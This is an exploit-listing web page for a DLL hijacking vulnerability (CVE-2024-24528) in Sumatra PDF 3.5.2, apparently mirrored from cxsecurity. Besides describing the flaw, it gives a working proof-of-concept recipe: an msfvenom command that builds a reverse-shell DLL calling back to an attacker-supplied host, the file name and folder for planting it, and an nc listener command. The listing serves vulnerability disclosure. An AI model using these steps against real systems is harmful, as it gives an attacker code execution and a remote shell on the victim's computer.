Advertisement






Sumatra PDF 3.5.2 DLL Hijacking

CVE Category Price Severity
CVE-2024-24528 CWE-427 $5,000 High
Author Risk Exploitation Type Date
Exploit Alert Team High Local 2024-02-06
CVSS
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024020032

Below is a copy:

Sumatra PDF 3.5.2 DLL Hijacking
# Exploit Title: Sumatra PDF 3.5.2 DLL Hijacking
# Date: 06.02.2024
# Exploit Author: Ravishanka Silva
# Vendor Homepage: https://www.sumatrapdfreader.org/free-pdf-reader
# Software Link: https://www.sumatrapdfreader.org/download-free-pdf-viewer
# Version: 3.5.2
# Tested on: Windows 10, Windows 11
# CVE : CVE-2024-24528

Description:
Sumatra PDF is a free and open-source document viewer for Windows. It is a lightweight and minimalistic application designed to quickly and efficiently view PDF, eBook (ePub, Mobi), XPS, DjVu, CHM, and comic book (CBZ and CBR) files.
Key features of Sumatra PDF include its fast startup and rendering speed, support for a variety of document formats, and a user-friendly interface. While it may not have all the advanced features found in some other PDF viewers, Sumatra PDF is a popular choice for users who prioritize speed and simplicity in a document viewer.

A DLL Hijacking vulnerability exists in Sumatra PDF Version 3.5.2 which allows a local attacker to execute arbitrary code and obtain a certain level of persistence on the compromised host, in the context of current logged-in user, by placing a crafted DLL in the installation directory, resulting in the hijacking of the following DLL files: 
dbgcore.DLL
profapi.dll
PROPSYS.dll
TextShaping.dll
DWrite.dll

Proof of Concept:

1. Create a malicious .dll file via msfvenom,
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=7777 -f dll -o dbgcore.DLL

2. Place the malicious DLL inside the Sumatra PDF installation folder. (Usually "C:\Users\<username>\AppData\Local\SumatraPDF")

3. Start a listener via nc,
nc -lvp 7777

4. Open Sumatra PDF application, and observe the execution of the reverse shell.

Demo:
https://drive.google.com/file/d/1-OMJ0ZvR9TYJEg_AwspRcGEAQvOLHJ41/view?usp=sharing

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.